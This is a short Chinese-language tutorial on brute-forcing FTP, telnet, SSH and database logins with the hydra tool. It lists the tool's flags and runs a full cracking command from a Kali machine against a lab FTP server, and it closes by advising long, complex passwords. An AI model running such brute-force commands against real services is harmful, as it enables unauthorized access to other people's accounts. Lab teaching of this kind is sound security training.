大家應該都知道暴力破解的原理,但卻不知道遇見telnet和ftp等服務和數據庫如何破解,今天小R就教大家如何利用一個工具就能對其破解。
今天要給大家介紹的工具是:hydra(中文名:九頭蛇)
這個名聽起來很好記吧
由於原理和過程都一樣,所以我只挑其中的一種來做實例。就以FTP為例吧
先講一下hydra的使用方法:
支持的爆破的服務有:ftp telnet mysql ssh等多種服務
hydra <參數><IP地址><服務名>
注意:hydra后面的參數是區分大小寫,所以一定要注意,小R一開始就是沒注意這個,費腦子費了好長時間。
-s <port> 指定端口
-l <username> 指定用戶名
-L <usrname.txt>指定用戶名的字典
-p<pdname> 指定密碼
-P<pdname>指定密碼的字典
-R 繼續上次的爆破
-v 顯示爆破的詳細過程
-t 設置線程數 (默認為16個線程)
試驗環境:
宿主機(win7):192.168.1.1 (FTP服務器) 帳號:test 密碼:admin
攻擊機(kali) :192.168.1.2 (自帶hydra)
kali操作:
1. 直接在終端上輸入:hydra -v -l test -P somd5-top1w.txt -t 10 192.168.1.1 ftp
如圖所示:
2. 這個時候看FTP服務器:
很明顯這是被爆破。所以講密碼的重要性很大,盡可能的設到最長(含特殊字符)